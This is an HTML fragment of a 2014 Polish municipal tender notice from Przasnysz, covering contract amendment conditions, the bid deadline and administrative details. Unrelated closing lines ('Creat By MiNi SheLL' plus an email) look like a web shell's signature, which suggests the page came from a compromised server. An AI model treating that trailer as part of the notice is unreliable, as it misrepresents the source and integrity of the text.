<li>2 - Projekt proponowanych urządzeń zabawowych - 30</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru wykonawcy.
 Warunki wprowadzenia zmian są następujące: 
1.	zmiana terminu realizacji przedmiotu umowy  będzie możliwa w przypadku:
-wystąpienia okoliczności niezależnych od Wykonawcy przy zachowaniu przez niego należytej staranności, skutkujących niemożnością dotrzymania terminu realizacji przedmiotu zamówienia,
-wstrzymania przez Zamawiającego wykonania robót nie wynikających z przyczyn leżących po stronie Wykonawcy. Powyższe nie dotyczy okoliczności wstrzymania robót przez inspektora nadzoru w przypadku stwierdzenia nieprawidłowości w wykonywaniu przedmiotu umowy. 
-konieczności wprowadzenia przez Zamawiającego korekt w dokumentacji projektowej (usunięcie wad projektu lub wprowadzenie rozwiązań zamiennych)  
-konieczności wykonania robót zamiennych, dodatkowych i innych niezbędnych do zakończenia przedmiotu umowy, w tym wynikających z korekty dokumentacji projektowej.  
-zaistnienia okoliczności utrudniających lub uniemożliwiających  terminowe zakończenie  przedmiotu umowy takich jak: warunki atmosferyczne, archeologiczne, geologiczne, hydrauliczne, kolizje z sieciami infrastruktury technicznej  
-opóźnienia, utrudnienia lub przeszkód spowodowanych przez Zamawiającego lub dających sie przypisać zamawiającemu  lub innemu wykonawcy zatrudnionemu przez zamawiającego na terenie budowy
-działania siły wyższej
2.	zmiana wynagrodzenia
-w przypadku zmiany  ustawowej stawki VAT w okresie realizacji umowy - dotyczy  tej części wynagrodzenia za roboty, której  nie zafakturowano  na dzień wejścia w życie przepisów o zmianie VAT.
-w przypadku zmiany zakresu rzeczowo - finansowego wskutek zlecenia przez Zamawiającego wykonania  robót koniecznych i  zamiennych, w tym wynikających z korekt  dokumentacji projektowej (usunięcie wad projektu lub wprowadzenie rozwiązań zamiennych)  
3.Inne zmiany: 
Zmiana zakresu rzeczowo - finansowego zamówienia w przypadku wystąpienia obiektywnych okoliczności skutkujących koniecznością zmiany w trakcie realizacji umowy zakresu rzeczowo - finansowego robót.
-Zmiany  zakresu podwykonawstwa poprzez: 
-wskazanie innych podwykonawców, 
-rezygnację z podwykonawców, 
-wskazanie innego zakresu podwykonawstwa albo wykonanie zamówienia przy pomocy podwykonawców, pomimo niewskazania w postępowaniu żadnej części zamówienia przeznaczonej do wykonania w ramach podwykonawstwa. 
Zmiana zakresu podwykonawstwa nie może  dotyczyć części zamówienia zastrzeżonych przez zamawiającego do osobistego wykonania przez wykonawcę.
Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 i SIWZ, wykonawca jest obowiązany wykazać zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia
-Rozszerzenie odpowiedzialności z tytułu gwarancji i rękojmi oraz przedłużenie terminu gwarancji i rękojmi w przypadku zaproponowania takiego rozwiązania przez Wykonawcę,
-Zmian osób reprezentujących, pod warunkiem wcześniejszego powiadomienia i akceptacji drugiej strony, w przypadku śmierci, choroby lub innych zdarzeń losowych, lub jeżeli zmiana stanie sie konieczna z jakichkolwiek innych przyczyn niezależnych od Zamawiającego lub Wykonawcy ( np. rezygnacji. itp.),
-zmiana danych teleadresowych stron umowy.
Powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę, jednocześnie nie stanowią one zobowiązania Zamawiającego na ich wprowadzenie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.przasnysz.um.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Przasnysz ul. J. Kilińskiego 2 06-300 Przasnysz..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.07.2014 godzina 12:00, miejsce: Urząd Miasta Przasnysz ul. J. Kilińskiego 2 06-300 Przasnysz Biuro Obsługi Interesanta..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt nie jest finansowany ze środków Unii Europejskiej. Nie przewiduje się zwrotu kosztów udziału w postępowaniu z zastrzeżeniem art. 93 ust. 4...</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com